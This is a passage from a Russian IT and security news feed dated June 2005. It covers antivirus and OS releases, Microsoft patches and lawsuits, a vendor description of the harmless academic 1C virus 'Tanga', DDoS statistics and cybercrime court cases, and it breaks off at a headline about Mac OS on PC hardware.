«Лаборатория Касперского» сообщает о выходе трех новых версий Антивируса Касперского, предназначенных для защиты почтовых и файловых серверов, а также рабочих станций под управлением операционных систем Linux, FreeBSD и OpenBSD – Антивируса Касперского для Linux, FreeBSD и OpenBSD Mail Server, File Server и Workstation. Продукты получили индекс 5.5 и включают в себя широкий ряд технологических и архитектурных изменений. Антивирус Касперского для Linux, FreeBSD и OpenBSD Workstation и File Server предназначен для антивирусной защиты рабочих станций и файловых серверов, работающих под управлением операционных систем Linux, FreeBSD или OpenBSD. Он позволяет эффективно осуществлять поиск и нейтрализацию вредоносных кодов во всех объектах файловых систем, расположенных на рабочей станции/сервере, при этом располагая удобной для пользователя системой автоматической загрузки обновлений антивирусной базы, а также гибким механизмом конфигурации антивирусной программы. Антивирус Касперского для Linux, FreeBSD и OpenBSD Mail Server обладает всеми возможностями Антивируса Касперского для Linux, FreeBSD и OpenBSD File Server, а также имеет ряд специфических функций. Среди них антивирусная проверка входящего и исходящего почтового SMTP-трафика сервера с последующей нейтрализацией обнаруженных вредоносных кодов в зараженной корреспонденции, обработка сообщений в соответствии с правилами, заданными для групп отправителей и получателей, и широкий спектр различных режимов фильтрации электронной почты.
Анонс компании

18/06/2005 10:54 Клиенты сообщили в Microsoft о пяти торгующих контрафактом фирмах
Компания Microsoft подала пять исков против тоговых компаний, базирующихся в штатах Калифорния и Вирджиния, обвиняя их в торговле нелегальным ПО, сообщает издание NewsFactor. Представитель Microsoft выступил по этому поводу с сзаявлением, в котором подчеркнул, что компания таким образом пытается уменьшить количество нелицензионного ПО собственного производства, находящегося на рынке. Представитель также отметил, что Microsoft надеется "удержать нелегальное ПО от пребывающих в неведении потребителей и компаний", имея в виду то, что зачастую в США пользователи ПО, пользующиеся контрафактными программами, не знают, что они нелегальны. Издание уточняет, что подача исков стала возможной после того, как на телефон специальной "горячей линии" Microsoft позвонили покупатели и сообщили, что купленное в уличенных в распространении контрафакта ПО показалось им подозрительным.
Подробности

18/06/2005 10:23 Longhorn Server готовится к летним испытаниям
Выход следующей версии Windows Server ожидается не ранее 2007 года, однако в четверг Microsoft пообещала выпустить бета-версию операционной системы уже этим летом. Представитель компании не назвал определенной даты выпуска бета-версии, но в среду модератор веб-чата Microsoft сообщил, что в августе компания планирует запустить еще один чат для обсуждения Beta 1. Летом Microsoft планирует также выпустить бета-версию настольной версии Longhorn, финальный релиз которой должен выйти во втором полугодии будущего года. В марте представитель Microsoft сказал, что компания предложит бета-версию Longhorn Server в этом году, однако подробностей не сообщил. Боб Маглиа, ответственный за Windows Server, говорил, что в Longhorn Server будет несколько изменений. Одно из направлений работы — упрощение специализации ОС для решения определенных серверных задач, таких как веб-сервер или сервер файлов и печати. Microsoft надеется, что это поможет сделать ОС более простой в эксплуатации и более безопасной. В числе других планируемых новшеств усовершенствования в службах терминала и механизме управления правами, а также новые инструменты управления и изменения, которые, по словам Маглиа, позволят реже перезагружать систему.
ZDNet

18/06/2005 10:09 Против ключевых сетей Великобритании идет масштабная хакерская атака
Британский Национальный инфраструктурный центр по координации в сфере безопасности (NISCC) распространил среди крупных коммерческих фирм и правительственных организаций предупреждение о масштабной хакерской атаке против ряда британских компьютерных сетей, пишет в четверг газета Financial Times. Специалисты центра сообщают, что в отношении около 300 сетей, считающихся важными составляющими информационной инфраструктуры Великобритании, в последние месяцы была проведена серия сложных хакерских операций с целью похищения ценной коммерческой и государственной информации. Эксперты из NISCC отмечают, что действия неизвестных хакеров носят беспрецедентно масштабный и высокоорганизованный характер. Следы ведут в страны Азии, однако в центре не уточняют, в какие именно. Отмечается, вместе с тем, что аналогичные атаки также замечены в сетях США, Западной Европы и Австралии. По данным экспертов, пока нет информации о том, что хакерам удалось украсть какие-либо важные данные, но администраторов соответствующих сетей призвали к повышенной бдительности.
Lenta.Ru

16/06/2005 13:48 Найден первый полноценный вирус, поражающий системы 1С
"Лаборатория Касперского" сообщает о регистрации первой вредоносной программы, поражающей известную систему автоматизации "1С:Предприятие" ведущего отечественного разработчика "1С". Данный вирус, получивший название Virus.1C.Tanga.a, был создан в академических целях и не содержит деструктивной функциональности. Создатель программы сам направил ее экспертам компании для изучения. 'Tanga' распространяется в системе "1С:Предприятие7.7" посредством заражения пользовательских файлов, отвечающих за внешние отчеты и имеющих расширение "ERT". Одним из встроенных в такой файл-отчет макромодулей и является вредоносная программа. Метод размещения 'Tanga' в инфицированных файлах во многом соответствует макро-вирусам, заражающим документы и таблицы пакета программ Microsoft Office. Зловредные модули располагаются в специальном блоке данных и активизируются при открытии файла-отчета. Подобно макросам Microsoft Office, они могут иметь автоматические именные идентификаторы, срабатывающие при различных действиях с файлом, например, его открытии. Для своего распространения 'Tanga' в полной мере использует мощный язык модулей "1С". Он позволяет вирусу обращаться к другим дисковым файлам, включая и файлы-отчеты, подобные зараженным, и, таким образом, размножаться. Таким образом, данный вредоносный код является первой полноценной программой-инфектором, созданной для платформы "1С:Предприятие7.7" и записывающей свой код в служебные файлы системы формата '*.ert'. Для работы вирус использует специальную библиотеку "Compound.dll". В случае, если данный файл отсутствует в системе, вирус выполняться не будет. Механизм действия 'Tanga' достаточно прост: при запуске зараженного ert-файла вирус проверяет наличие в системе файла "Compound.dll", затем последовательно сканирует все каталоги текущего диска в поиске файлов с расширением "ert". В найденных файлах проверяется наличие строки: Tango.ERT.2622. Если она найдена, то файл уже был заражен ранее, и повторной записи зловредного кода не происходит. В противном случае, вирус создает в файле модуль с именем "1C Programm text", в который записывает свой код. Необходимо отметить, что автор этой версии 'Tanga' проявил понимание сложности работы антивирусных экспертов, и сделал все для того, чтобы минимизировать время анализа кода и ущерб от его возможного распространения. Для этого создатель вируса лишил его каких-либо деструктивных функций, сделав программу безопасной даже в случае заражения, а также снабдил направленный специалистам "Лаборатории Касперского" экземпляр развернутым описанием на русском языке.
Описание вируса

16/06/2005 12:59 Крупные провайдеры признаны источниками DDoS-атак
Сети America Online и других крупных интернет-провайдеров являются источниками большинства DDoS-атак, сообщает Reuters со ссылкой на компанию Prolexic Technologies. В числе основных источников DDoS-атак оказались также провайдеры из Германии (T-Mobile) и Франции (Wanadoo). По мнению представителя Prolexic Technologies Барретта Лиона (Barrett Lyon), отчет компании показывает, что многие провайдеры не обеспечивают должным образом защиту своих клиентов: «Их клиенты либо подвергаются кибернападениям, либо сами могут стать участниками нападения из-за плохой работы фильтров». Пресс-секретарь America Online Эндрю Вайнштейн (Andrew Weinstein) полагает, что число DDoS-атак с компьютеров клиентов компании лишь свидетельствует о ее большой клиентской базе. По словам Вайнштейна, провайдеры с меньшим числом клиентов не сильно уступают America Online по числу DDoS-атак. Компания обеспечивает своих клиентов антивирусными и антихакерскими программами, а пользователи, оказавшиеся причастными к атакам, вероятно, просто не обновили версии этих программ, заключил Вайнштейн. Объектами первых DDoS-атак были сайты правительственных структур США или крупных онлайн-вендоров, например, eBay. В последние годы преступники используют DDoS-атаки для вымогания денег у онлайновых казино, банков или для атак конкурентов. Частота DDoS-атак постепенно увеличивает с 1-2 в месяц до 1-2 в неделю. При этом преступники постоянно используют новые методы для достижения своих целей. В мае Федеральная комиссия США по торговле обратилась к провайдерам с предложением отключать от сетей компьютеры клиентов, зараженных вредоносными программами для рассылки спама или направления ложных запросов на атакуемые серверы. Основной трафик DDoS-атак (до 18%) приходится на компьютеры, расположенные на территории США. В число других наиболее опасных для пользователей стран входят Гонконг, Германия, Малайзия и Великобритания.
Источник

16/06/2005 12:46 Visual Basic для Linux
Начато открытое бета-тестирование среды разработки RealBasic 2005, основанной на языке, максимально совместимом с Visual Basic, сообщает linux.org.ru. RealBasic поддерживает платформы Linux/GTK2, Windows и MacOS X. В состав системы входит БД Real SQL Database (на базе Sqlite), средства для создания сетевых приложений, утилиты для переноса приложений VB. Standart Edition для Linux распространяется бесплатно. Выход финальной версии запланирован на август.
Подробности

16/06/2005 12:04 Sun модернизирует процесс загрузки Solaris
Sun Microsystems совершенствует процесс загрузки операционной системы Solaris, отказавшись от неуклюжего, устаревшего подхода в пользу более быстрого, удобного и совместимого. Новый процесс загрузки Newboot дебютировал во вторник в OpenSolaris, версии операционной системы Unix с открытым исходным кодом, которую начала публиковать Sun. Кроме переработанных собственных компонентов, компания использовала в нем ПО GRUB (Grand Unified Bootloader), которое применяется в Red Hat Enterprise Linux, Suse Linux Enterprise Server и многих других версиях Linux. Фаулер утверждает, что благодаря GRUB, Solaris станет лучше подходить для массовой вычислительной техники. «Ее ожидает очень хороший прием. Мы перестанем с самого начала, с важнейшего момента инсталляции, выглядеть чужаками». Новый процесс запуска начинает GRUB, который отображает меню вариантов операционной системы. Если пользователь выбирает Solaris, то GRUB управляет машиной посредством ПО Sun, называемого Multiboot. Инженер Solaris Жан Сетье-Эйлер описывает эту технологию в своем блоге. Другое усовершенствование процесса загрузки, которое Sun обещает добавить позднее, относится к работе Solaris как на процессорах Sparc, так и на системах х86.
Подробности

16/06/2005 11:32 DivX выпустила новый, высококачественный видеоформат
В среду компания DivX выпустила новую версию своего инструментария цифрового видео и утверждает, что по качеству она не уступает последним версиям конкурирующих продуктов Apple Computer или Microsoft. Новая технология, шестой полный релиз небольшой компании из Сан-Диего, нацелена на усиление роли DivX на потребительском рынке и предназначена для персонального хранения фильмов high-definition и даже коммерческой дистрибуции кинофильмов. Новые инструменты «совместимы с миллионами сертифицированных DVD-плееров DivX и других устройств, — сказал директор DivX Йордан Гринхолл. — Они отличаются от других видеотехнологий, присутствующих на рынке, повышенной производительностью, улучшенным качеством изображения и более широкой совместимостью».
ZDNet

16/06/2005 11:00 Cрок за махинации с телефонными картами
В Ростове-на-Дону пятеро студентов были осуждены на срок 1,5 года лишения свободы условно за мошенничество при пользовании услугами мобильной связи. Как установили правоохранительные органы, студенты пополняли свои мобильные счета средствами со счетов других пользователей. Как сообщила агентству "Интерфакс" старший помощник прокурора Ростовской области Елена Великова, согласно материалам уголовного дела, возбужденного по статье 272 УК РФ ("неправомерный доступ к компьютерной информации"), в прошлом году в адрес оператора сотовой сети "Мегафон" в Ростове-на-Дону стали поступать обращения от пользователей о невозможности активации приобретенных карт оплаты. Следствие установило, что в мае 2004 года пятеро студентов ростовских вузов, жители станицы Милютинской и города Новочеркасска Ростовской области, "опытным путем подобрали знаково-цифровую комбинацию, ввод которой с определенной модели телефона стандарта GSM позволял им пополнять собственный абонентский счет". "Деньги на их счета поступали как раз в тот момент, когда добропорядочный пользователь активировал карту оплаты", - уточнила Великова.
Источник

16/06/2005 10:50 Первый выпуск журнала Fuck`in Hoax #0
Вышел официальный релиз журнала Fuck`in Hoax #0 от Black Logic Team.
Содержание:
0x00 - Intro
0x01 - Анализ системы удаленного контроля NTRootKit. Его реализация на основе драйвера в Windows 2000.
0x02 - crypto-keygenning4newbies part 1: "Подстановочные/перестановочные алгоритмы и хэш-функции"
0x03 - 'Cerberus Shield' keygenning practice.
0x04 - a311Death inside
0x05 - ДЖОЙНЕР МОЕЙ МЕЧТЫ
0x06 - Обзор Scrambler-защиты. Написание UnScrambler.
0x07 - Гейт, как новое поколение клиентов
0x08 - Банальный xchg
0x09 - life
0x0A - Все по-старому...
0x0B – Outro
Toolz:
toolz_0x01 - "Fuck'n'Joy v1.0c" by UsAr
toolz_0x02 - "PlayIn 1.0.1 by bi0w0rM (full reversed and updated by dzen)
toolz_0x03 - "tDS Patcher v0.4 Public Release" by dzen
Журнал
Запасной вариант

15/06/2005 13:32 Бизнес оказался беззащитным перед USB-накопителями
Компании не обращают внимания на угрозу собственной IT-безопасности, исходящую со стороны пользователей портативных USB-накопителей. К такому выводу в ходе специального опроса пришли эксперты компании PointSec, сообщает сайт vnunet.com. Специалисты PoinSec выяснили, что 90 процентам компаний известно о небезопасном характере использования USB-накопителей. Но при этом очень малая часть компаний принимает меры для защиты от подобной угрозы. Треть опрошенных признает, что их сотрудники пользуются портативными накопителями без какой-либо дополнительной авторизации. 41 процент IT-профессионалов не имеет представления о том, как защитить корпоративную информацию от копирования на USB-накопители. По мнению главного аналитика и эксперта в области IT-безопасности компании Ovum Грэхэма Титтерингтона (Graham Titterington), использование USB-накопителей позволяет их обладателям обходить такие системы как межсетевые экраны и делает системы уязвимыми, как для входящих, так и исходящих угроз. «Портативные накопители могут заразить систему вредоносными программами, а также позволяют незаконно и бесконтрольно копировать коммерчески важные данные», — считает Титтерингтон. В то же время он признает, что в любые времена сотрудники компаний могли выносить важные документы в бумажном виде: «Бизнес основан на высоком уровне доверия между работодателем и работником, и эта ситуация не меняется с появлением портативных накопителей. Если доверия нет, проблемы возникают в любом случае».
Источник

15/06/2005 13:09 Что лучше: Linux или BSD?
В очередной раз порадовал проект Opennet.ru, опубликовав ссылки на интервью, целью которых было - определить, что лучше - Linux или BSD? Причём, как ни странно, по раздельности (занятно было бы наблюдать на аналог программы Соловьёва "К барьеру!", хотя, думаю, разработчики и координаторы проектов вели бы себя намного достойнее некторых депутатов). Итак, сначала на подобный вопрос ответил Линус Торвальдс (создатель сами_знаете_какой_ОС). Потом на подобные же вопросы ответили представители клана BSD - Theo de Raadt (лидер проекта OpenBSD) и Christos Zoulas (NetBSD). Осталось, чтобы проект (в лице журналистов) проинтервьюировал бы в подобном духе Билла Гейтса.
Интервью с Торвальдсом
Интервью с представителями BSD

15/06/2005 12:51 NetBSD просит о помощи
Проект NetBSD остро нуждается в дополнительных вычислительных мощностях для системы сборки а также в замене анонимного CVS-сервера на новый, в связи с чем объявляется сбор средств, сообщает linux.org.ru.
Подробности

15/06/2005 12:23 Троян Skulls маскируется под антивирус
Skulls-L, модификация троянской программы Skulls-C, заражает мобильники, маскируясь под антивирусное ПО от F-Secure. Код демонстрирует следующий текст: F-Secure Antivirus protect you against the virus. And don`t forget to update this! (антивирус F-Secure защитит Вас, не забудьте загрузить обновление!). Попав на смартфон на Symbian, Skulls-L удаляет программные файлы, дающие возможность обмена сообщениями и доступа в сеть, и заменяет иконки на изображения черепа (англ. Skull) со скрещенными костями, за что и получил свое название. Эксперты F-Secure советуют загружать обновления своих продуктов только с корпоративного сайта или через линк phoneav.com.
Источник

15/06/2005 11:39 Долгий путь к Windows ХР
Microsoft Windows XP все больше используется в корпорациях, однако новое исследование показало, что почти половина ПК все еще работает на устаревшей операционной системе Windows 2000. Отчет, опубликованный во вторник компанией AssetMetrix, выпячивает наболевшую проблему Microsoft: компания тратит миллиарды долларов на разработку новых версий Windows и Office, в то время как многие заказчики не спешат расставаться с устаревшими версиями программного обеспечения, которое все еще работает достаточно хорошо. Исследование AssetMetrix показало, что многие компании уже отказались от других версий Windows, включая Windows NT 4, Windows 95 и Windows 98. К первому кварталу этого года распространенность Windows XP достигла 38%, что на 6,6% больше, чем в третьем квартале 2003 года. Однако Windows 2000 остается очень популярной: в первом квартале почтенная операционная система все еще использовалась на 48% корпоративных ПК, что всего на четыре процентных пункта меньше, чем в третьем квартале 2003 года. Аналитики отмечают, что в последние годы сдержанность заказчиков в отношении апгрейда только усилилась. Сейчас затянувшееся использование Windows 2000 приобретает особое значение, так как Microsoft готовится в конце текущего месяца прекратить массовую поддержку этой ОС. Компания продолжит выпускать патчи для всех важных проблем безопасности, но свернет разработку большинства других обновлений. Поддержка по телефону по вопросам, не связанным с безопасностью, будет продолжаться на платной основе. Microsoft готовит последнее обновление Windows 2000. В прошлом году компания решила воздержаться от выпуска полного сервисного пакета, и вместо этого предложит то, что она называет Update Rollup — умеренный набор секьюрити-поправок и обновлений, добавленных после выхода Service Pack 4 в июне 2003 года. Компания пообещала Update Rollup к середине года, но не уточнила, что туда войдет кроме уже выпущенных патчей и апдейтов. Не предлагая более полного сервисного пакета, Microsoft, возможно, сигнализирует заказчикам, желающим получить новые возможности, о необходимости апгрейда.
Отчёт

15/06/2005 11:17 Ошибки Java открывают двери хакерам
Sun Microsystems исправила пару ошибок в программном обеспечении Java, которыми злоумышленники могут воспользоваться для атак на компьютеры под Windows, Linux и Solaris, сообщает ZDNet. Компания Secunia в своем секьюрити-бюллетене называет эти ошибки «высококритичными», так что они на один уровень недотягивают до максимального рейтинга «экстремально критичных». Такие ошибки обычно могут использоваться дистанционно и ведут к захвату злоумышленником полного контроля над системой. Обе ошибки связаны с Java Runtime Environment (JRE). Это ПО Java предназначено для исполнения Java-программ и установлено на системах многих пользователей. Ошибки позволяют Java-приложению читать и записывать на уязвимый компьютер файлы или исполняемые программы — Sun сообщила об этом в двух отдельных предупреждениях, распространенных в понедельник. Одна уязвимость вызвана общей ошибкой JRE, а другая относится к технологии Java Web Start, предназначенной для загрузки Java-приложений по сети, например по интернету. French Security Incident Response Team называет обе уязвимости «критическими», отмечая, что их можно использовать через подложный веб-сайт. Sun утверждает, что ей неизвестно о каких-либо эксплойтах или реальных атаках с использованием этих ошибок. JRE входит в состав Sun Java 2 Platform Standard Edition (J2SE). Обе ошибки проявляются в версиях J2SE 5.0 и 5.0 Update 1 для Windows, Solaris и Linux. Sun призывает пользователей установить исправленное ПО, чтобы защититься от возможных атак. Она выпустила два обновления: J2SE 1.4.2_08 и J2SE 5.0 Update 2 (доступно с пятницы). Указанное ПО можно загрузить с веб-сайта Java.com.
Первая уязвимость
Вторая уязвимость

15/06/2005 10:41 Серия патчей для ОС семейства Windows
Microsoft выпущена серия патчей для ОС семейства Windows - 3 бюллетеня носят статус критических, ещё 4 - важных, и остальные 3 - умеренных (moderate). «Этот набор поправок нельзя недооценивать, — сказал специалист McAfee Джимми Куо. — Три из них устраняют возможность дистанционного исполнения кода — причем одна, особенно серьезная, в IE. Еще две — в HTML Help и Server Message Block, которые тоже установлены на всех ПК с Windows». Важные бюллетени описывают и устраняют уязвимости в самой Windows, а также в Windows Services for Unix, Internet Security and Acceleration Server и Small Business Server. Умеренные бюллетени устраняют уязвимости опять же в самой Windows и сервере электронной почты Exchange. Microsoft предупреждает, что каждая из трех критических ошибок позволяет злоумышленникам дистанционно перехватить управление компьютером. Проблема IE (MS05-025) относится к категории PNG Image Rendering Memory Corruption (искажение содержимого памяти визуализации изображений в формате PNG) и проявляется в нескольких версиях браузера, включая IE 6 for Windows XP Service Pack 2. Изображения PNG аналогичны изображениям JPEG и используются во многих мультимедийных форматах. Уязвимость IE позволяет искажать поля при обработке изображений, что может вызвать переполнение буфера и открыть систему для злоумышленника. «PNG-уязвимость в данном случае самая опасная, — комментирует старший директор Symantec Security Response Винсент Уифер. — Это ошибка формата файлов — предмет, о котором пользователи редко задумываются, поэтому надо быть вдвойне начеку». Уязвимость HTML Help (MS05-026) влияет на Windows XP Service Pack 1 и 2, Windows 2000 Service Pack 3 и 4, а также на другие версии и сервисные пакеты. Уязвимость Server Message Block (MS05-027) хотя и может позволить злоумышленнику проникнуть в ПК, атакующий должен пройти аутентификацию в системе. Эта уязвимость проявляется в Windows XP Service Packs 1 и 2, Windows 2000 Service Packs 3 и 4 и других версиях Windows.
Июньская серия патчей

15/06/2005 10:20 Все секреты россиян соберут в одной базе данных
Российское правительство одобрило концепцию системы персонального учета населения (СПУН), которая объединит уже существующие информационные системы учета населения и даст чиновникам возможность без особого труда обмениваться персональными данными граждан, сообщает "Газета". Сегодня существует порядка 18 ведомственных баз данных. Самая большая из них, основанная на результатах переписи населения, хранится в статистическом ведомстве. Она содержит информацию о фамилии, имени и отчестве, поле, дате рождения, совместно проживающих родственниках, семейном положении, месте рождения и гражданстве. В МВД существует база по выданным паспортам. Свои базы данных имеются у Федеральной налоговой службы, ЗАГСов, ЖКХ. Проблема заключается в том, что информация, которая хранится в этих базах, страдает неполнотой, а сами базы, как правило, не стыкуются между собой. Впервые о СПУН заговорили в конце прошлого года. Это система взаимодействия органов государственной власти, местных администраций, государственных и муниципальных организаций по обмену персональными данными о россиянах, иностранцах и лицах без гражданства. В основу системы ляжет государственный регистр населения (ГРН), включающий уникальный для каждого человека идентификатор персональных данных и соответствующие ему идентификационные сведения.
Lenta.Ru

14/06/2005 14:25 Компания NetUP открыла исходные коды ndsad
Компания NetUP объявляет об открытии исходных кодов коллектора статистики ndsad по лицензии GPL. Демон ndsad предназначен для сбора информации по трафику с интерфейсов PC-маршрутизатора и экспорта ее в формате NetFlow. Проект будет базироваться на SourceForge.net. Получить последнюю версию исходных кодов ndsad можно через CVS: cvs -d:pserver:anonymous@cvs.sourceforge.net :/cvsroot/ndsad login. cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net :/cvsroot/ndsad co -P, сообщает linux.org.ru.
Сайт проекта

14/06/2005 14:01 Обновление ZoneAlarm вывело из строя 50 тысяч компьютеров
Около 50 тысяч пользователей межсетевых экранов ZoneAlarm Pro и ZoneAlarm Security Suite столкнулись с серьезными проблемами в работе своих компьютеров после загрузки последнего обновления для защитных программ. Проблемы возникали сразу после того, как пользователи устанавливали новую версию Program Advisor для ZoneAlarm, которая выходит ежедневно. Ситуация возникла по вине инженеров Zone Labs, которые не обнаружили сбой в программном обновлении и сделали его доступным для пользователей, сообщает News.com. «Мы столкнулись с чем-то вроде нарушения процессов», — описал проблему генеральный менеджер Zone Labs Грегор Фройнд (Gregor Freund). Ежедневное обновление Program Advisor представляет собой список программ, которые могут быть установлены на компьютер без каких-либо дополнительных действий пользователя. Большинство пользователей, столкнувшихся с нарушениями в работе компьютеров, находились в Азии. Это объясняется тем, что обновление вышло утром, и пользователи загружали его одновременно с включением компьютера, отметил Фройнд. После обращений ряда пользователей Zone Labs обратила внимание на возникшую проблему и через несколько часов выпустила новое обновление, которое устанавливалось на компьютер при перезагрузке. Проблема коснулась пользователей только коммерческих версий ZoneAlarm, поскольку в бесплатной версии этой программы нет функции Program Advisor.
Источник

14/06/2005 12:56 Sun опубликует ядро Solaris в Сети
Sun Microsystems продолжает открывать исходные коды своих программных продуктов. Вслед за передачей сообществу открытого ПО свыше 1,6 тыс. патентов, касающихся ОС Solaris, компания на днях выложит в Сеть некоторые компоненты из дистрибутива ОС OpenSolaris. Ядро и сетевое ПО будут доступны в интернете на специальном сайте под лицензией Common Development and Distribution License (CDDL). После этого программными средствами с открытым кодом станут другие компоненты системы, инструменты администрирования и установки. Как сообщили представители Sun, теперь любой разработчик сможет скачать с сайта коды ОС OpenSolaris, совместить их с собственными наработками и выпустить собственный коммерческий продукт. Никаких отчислений за использование ПО под лицензией CDDL не требуется, подчеркивают в Sun. Ядро системы, которое можно будет скачать с сайта, обладает целым рядом особенностей. Основными из них являются превентивная самодиагностика (Predictive Self Healing) и так называемые контейнеры. Первая технология позволяет перезапускать приложения и сервисы, в которых были обнаружены нарушения работы, причем процесс диагностики занимает считанные миллисекунды. Вторая разработка дает системному администратору возможность создавать виртуальные системные разделы, называемые зонами. У каждой из них свои пользователи, свои каталог, свои сетевые адреса и процессы. Зоны изолированы друг от друга таким образом, что процессы и пользователи, работающие в одной зоне, не имеют доступа к процессам и ресурсам другой. Даже суперпользователь (root) не имеет возможности увидеть, что происходит в другом контейнере. OpenSolaris совместима с системами Intel x86, AMD Operton и Sparc.
Исходники

14/06/2005 11:49 Symantec защитит корпоративные сети от вторжений
В понедельник Symantec представит новый продукт для обнаружения вторжений в корпоративную сеть, а конкурирующая фирма McAfee анонсирует Linux-версию аналогичного ПО Entercept. Система Critical System Protection 4.5 основана на технологии компании Platform Logic, которую Symantec приобрела в декабре, и предназначена для защиты корпоративных рабочих станций и серверов от неидентифицируемых атак. Как и другие поведенческие системы обнаружения вторжений, она наблюдает за действиями программ, выявляя и блокируя вирусы и червей. Symantec переработала оригинальное ПО Platform Logic AppFire, сделав его совместимым с другими своими продуктами. По словам директора компании по производству Чирантана Дезаи, у Critical System Protection 4.5 собственный интерфейс управления, но Symantec работает над общим интерфейсом для всех своих продуктов. Новое ПО предназначено для крупных организаций и должно применяться вместе с другими продуктами Symantec — в частности, с AntiVirus Corporate Edition и Client Security. Если Critical System Protection обеспечивает защиту на базе поведения программ, то Client Security добавляет обнаружение вторжений по известным сигнатурам. Продукты этого типа обнаруживают вредоносные программы, сравнивая их с поставляемыми производителем ПО и регулярно обновляемыми определениями, и во многом напоминают антивирусные продукты. Конкурирующее ПО McAfee Entercept обеспечивает защиту от вторжений, используя как правила поведения, так и сигнатуры. В понедельник компания (бывшая Network Associates) планирует объявить, что теперь Entercept работает на серверах Red Hat Enterprise Linux 3. Продукт уже поддерживает операционные системы Microsoft Windows и Solaris от Sun Microsystems. Symantec Critical System Protection 4.5 поступит в продажу ближе к концу июня и будет работать на Windows XP и Windows 2000 (Server и Client), Windows Server 2003, Solaris и Suse Linux.
ZDNet

14/06/2005 10:44 Выход Fedora Core 4
Очердным дистрибутивом клона Red Hat под названием Fedora Core 4 порадовала своих почитателей теперь уже отданная почти в самостоятельное плавание компания Fedora Foundation. Как сообщает nixp.ru, в официальном анонсе написано следующее: «Возможно, вы думали, что используете самое последнее и лучшее программное обеспечение с открытым кодом, однако сегодня у нас есть для кое-что по-настоящему захватывающее… FEDORA CORE FOUR». Среди вошедшего в Fedora Core 4 программного обеспечения: графические оболочки GNOME 2.10 и KDE 3.4, предварительный релиз открытого офисного пакета OpenOffice.org 2.0, Eclipse и полностью открытый Java-набор (GCJ), Fedora Extras (многочисленные дополнительные пакеты). Кроме того, отмечается поддержка платформы PPC (PowerPC).
Российское зеркало FC4

14/06/2005 10:41 Nokia создаст новый мобильный браузер на базе Apple Safari
Финская компания Nokia, ведущий производитель мобильных телефонов, объявила о совместном проекте с компьютерной компанией Apple по разработке нового интернет-браузера для мобильных устройств, сообщает Reuters. По сообщению компании, браузер будет использовать "открытые" компоненты, созданные для браузера Safari - стандартной программы просмотра интернет-страниц для платформы Apple Macintosh. Готовый продукт планируется представить в первой половине 2006 года. Кроме того, Nokia объявила, что и далее будет продолжать сотрудничество с Apple. Reuters отмечает, что в минувшем марте Nokia также заключила аналогичный контракт с норвежской компанией Opera Software, производителем браузера Opera. В некоторых моделях телефонов Nokia уже применяется браузер, созданный на основе технологий Opera. Кроме того, Nokia в понедельник представила 7 новых моделей мобильных телефонов серии 6000, в которые встроены высококачественные цифровые камеры. Телефоны относятся к так называемому третьему поколению мобильных устройств и позиционируются как модели "высокого класса" с отпускными ценами от 170 до 460 долларов, их появление на рынке ожидается к концу года. Как ранее сообщалось, в пятницу Nokia также объявила о совместном проекте с ведущим производителем микропроцессоров Intel - компании планируют создать новый пакет цифровых мобильных сервисов на базе формата высокоскоростной беспроводной передачи данных WiMAX.
Lenta.Ru

13/06/2005 13:42 Yahoo!Messenger теперь совместим с Firefox
Компания Yahoo выдержала почти трехмесячную паузу, прежде чем выполнила просьбу создателей браузера Mozilla Firefox. Дело в том, что, начиная с апреля 2004 года, IM-клиент Yahoo!Messenger поддерживает так называемые "аватары", управлять которыми до вчерашнего дня могли только пользователи браузера MS Internet Explorer. Приверженцам альтернативного решения оставалось только скрипеть зубами и надеяться, что рано или поздно Yahoo вспомнит и о них. Луч надежды мелькнул сначала в феврале, когда Yahoo выпустила специальную панель инструментов для Firefox, а затем и марте, когда компания пообещала-таки добиться совместимости своего чат-сервиса с Firefox, хотя и не стала называть конкретной даты.
Источник

13/06/2005 12:37 Нанесенный ущерб за взлом компании "СССС" - оценен в 10 тыс. рублей
Из "простого любопытства" - так он сам объяснил свои действия на суде - он взломал систему защиты телекомуникационной системы "СССС" (Саратовская система сотовой связи) и выкрал коды карт авансовых платежей за интернет-услуги, которые еще не поступили в продажу, - сообщили РИА "Новости" в городской прокуратуре. К расследованию инцидента подключилось Управление "К" ГУВД области, специалисты которого установили адрес компьютера, с которого злоумышленник зашел на сервер компании. Нанесенный хакером ущерб компании "СССС" был оценен в 10 тыс. рублей. "Компьютерщику грозило до 5 лет лишения свободы, однако в ходе судебного заседания он раскаялся и пообещал возместить нанесенный ущерб. Дело было прекращено ввиду примирения сторон", - добавили в прокуратуре.
Источник

13/06/2005 10:54 Вторая система Blue Gene выходит на новый уровень производительности
Второй суперкомпьютер IBM Blue Gene/L показал рекордные результаты испытаний на быстродействие. Система Blue Gene Watson, размещенная в Научно-исследовательском центре IBM им. Томаса Ватсона, показала производительность в 91,3 трлн операций в секунду, или 91,3 терафлопс. Это означает, что она уступает только первой системе IBM Blue Gene/L, самому быстрому суперкомпьютеру в мире, расположенному в Ливерморской национальной лаборатории им. Лоуренса, производительность которого составляет 135 терафлопс. В ближайшее время должно прозвучать много подобных анонсов: через две недели будет опубликована очередная версия списка 500 самых быстродействующих суперкомпьютеров. Этот список обновляется дважды в год на конференциях по суперкомпьютерам. Новые результаты, полученные с использованием теста на алгебраические вычисления Linpack, ставят IBM еще на одну ступень впереди Silicon Graphics, чья система Columbia, установленная в NASA, продемонстрировала прошлой осенью производительность 51,9 терафлопс. Big Blue лидирует в списке Top 500 с большим отрывом и намерена и впредь оставаться на вершине. Ливерморский компьютер готовится к новому удвоению размера — что должно еще почти удвоить его производительность. IBM продает системы Blue Gene примерно за $2 млн за стойку; каждая стойка содержит по 1024 процессора, а в системе Blue Gene Watson 20 таких стоек. Она применялась для моделирования белков в исследованиях, связанных с биологией и фармакологией.
Источник

13/06/2005 10:32 Адаптированную для процессоров Intel систему MacOS можно устанавливать на платформу PC
